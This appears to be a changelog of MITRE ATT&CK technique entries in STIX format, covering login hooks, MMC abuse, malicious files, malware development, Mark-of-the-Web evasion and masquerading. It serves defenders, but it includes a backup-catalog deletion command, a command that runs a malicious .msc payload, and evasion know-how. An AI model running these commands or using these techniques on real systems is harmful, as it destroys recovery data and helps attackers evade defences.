| x_mitre_contributors | ['Harshal Tupsamudre, Qualys', 'Miriam Wiesner, @miriamxyra, Microsoft Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-26 17:48:27.871000+00:00 | 2022-08-25 13:03:08.484000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Group: Group Enumeration |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. | Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 16:49:15.786000+00:00 | 2022-04-20 16:42:05.094000+00:00 |
| name | Logon Script (Mac) | Login Hook |
| description | Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. | Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) |
| external_references[1]['source_name'] | creating login hook | Login Scripts Apple Dev |
| external_references[1]['description'] | Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved July 17, 2017. | Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022. |
| external_references[1]['url'] | https://support.apple.com/de-at/HT2420 | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html |
| external_references[2]['source_name'] | S1 macOs Persistence | LoginWindowScripts Apple Dev |
| external_references[2]['description'] | Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020. | Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022. |
| external_references[2]['url'] | https://www.sentinelone.com/blog/how-malware-persists-on-macos/ | https://developer.apple.com/documentation/devicemanagement/loginwindowscripts |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wardle Persistence Chapter', 'description': 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.', 'url': 'https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf'} | |
| external_references | {'source_name': 'S1 macOs Persistence', 'description': 'Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.', 'url': 'https://www.sentinelone.com/blog/how-malware-persists-on-macos/'} |
| Old Description | New Description |
|---|---|
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.
Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 00:13:18.889000+00:00 | 2022-05-20 17:41:16.112000+00:00 |
| description | Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.
Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.
Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) |
| external_references[1]['source_name'] | win_mmc | abusing_com_reg |
| external_references[1]['description'] | Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021. | bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
| external_references[2]['source_name'] | what_is_mmc | mmc_vulns |
| external_references[2]['description'] | Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021. | Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console | https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/ |
| external_references[4]['source_name'] | win_wbadmin_delete_catalog | win_mmc |
| external_references[4]['description'] | Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021. | Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc |
| external_references[5]['source_name'] | phobos_virustotal | win_wbadmin_delete_catalog |
| external_references[5]['description'] | Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021. | Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021. |
| external_references[5]['url'] | https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog |
| external_references[7]['source_name'] | mmc_vulns | what_is_mmc |
| external_references[7]['description'] | Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021. | Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021. |
| external_references[7]['url'] | https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/ | https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console |
| external_references[8]['source_name'] | abusing_com_reg | phobos_virustotal |
| external_references[8]['description'] | bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021. | Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021. |
| external_references[8]['url'] | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ | https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['TruKno'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-21 23:10:47.193000+00:00 | 2022-05-20 17:19:50.801000+00:00 |
| description | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Password Protected Word Docs', 'description': "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.", 'url': 'https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/'} |
| Description |
|---|
| Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:05:41.186000+00:00 | 2022-01-14 17:14:27.890000+00:00 |
| external_references[4]['description'] | Federal Bureau of Investigation, Cyber Division. (2020, March 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection Attacks. Retrieved October 14, 2020. | The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022. |
| external_references[4]['url'] | https://www.losangeles.va.gov/documents/MI-000120-MW.pdf | https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/ |
| x_mitre_data_sources[0] | Malware Repository: Malware Metadata | Malware Repository: Malware Content |
| x_mitre_data_sources[1] | Malware Repository: Malware Content | Malware Repository: Malware Metadata |
| Description |
|---|
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 22:47:08.289000+00:00 | 2022-05-05 04:59:32.535000+00:00 |
| external_references[1]['source_name'] | Microsoft Zone.Identifier 2020 | Beek Use of VHD Dec 2020 |
| external_references[1]['description'] | Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021. | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8 | https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 |
| external_references[2]['source_name'] | Beek Use of VHD Dec 2020 | Outflank MotW 2020 |
| external_references[2]['description'] | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021. | Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021. |
| external_references[2]['url'] | https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 | https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/ |
| external_references[3]['source_name'] | Outflank MotW 2020 | Intezer Russian APT Dec 2020 |
| external_references[3]['description'] | Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021. | Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021. |
| external_references[3]['url'] | https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/ | https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ |
| external_references[4]['source_name'] | Intezer Russian APT Dec 2020 | Microsoft Zone.Identifier 2020 |
| external_references[4]['description'] | Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021. | Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021. |
| external_references[4]['url'] | https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ | https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8 |
| x_mitre_defense_bypassed[0] | Anti-virus, Application control | Anti-virus |
| x_mitre_detection | Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. | Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO) |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Disable automount for ISO', 'description': 'wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.', 'url': 'https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7'} | |
| x_mitre_defense_bypassed | Application Control |
| Description |
|---|
| Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. | |
| external_references | CAPEC-177 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-177 | |
| external_references | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 13:24:52.973000+00:00 | 2022-05-05 04:56:08.978000+00:00 |
| external_references[1]['source_name'] | capec | Twitter ItsReallyNick Masquerading Update |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/177.html | https://twitter.com/ItsReallyNick/status/1055321652777619457 |
| external_references[2]['source_name'] | LOLBAS Main Site | Elastic Masquerade Ball |
| external_references[2]['description'] | LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. |
| external_references[2]['url'] | https://lolbas-project.github.io/ | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf |
| external_references[3]['source_name'] | Elastic Masquerade Ball | LOLBAS Main Site |
| external_references[3]['description'] | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. | LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. |
| external_references[3]['url'] | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf | https://lolbas-project.github.io/ |
| external_references[4]['source_name'] | Twitter ItsReallyNick Masquerading Update | capec |
| external_references[4]['url'] | https://twitter.com/ItsReallyNick/status/1055321652777619457 | https://capec.mitre.org/data/definitions/177.html |
| x_mitre_defense_bypassed[0] | Application control by file name or path | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Metadata | |
| x_mitre_data_sources | Image: Image Metadata | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Image: Image Metadata | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_data_sources | Service: Service Metadata |
| Description |
|---|
| Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. Adversaries may also use the same icon of the file they are trying to mimic. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. | |
| external_references | CAPEC-177 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-177 | |
| external_references | Docker. (n.d.). Docker Images. Retrieved April 6, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 19:23:37.762000+00:00 | 2022-05-05 04:56:50.197000+00:00 |
| external_references[1]['source_name'] | capec | Twitter ItsReallyNick Masquerading Update |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/177.html | https://twitter.com/ItsReallyNick/status/1055321652777619457 |
| external_references[2]['source_name'] | Elastic Masquerade Ball | Docker Images |
| external_references[2]['description'] | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. | Docker. (n.d.). Docker Images. Retrieved April 6, 2021. |
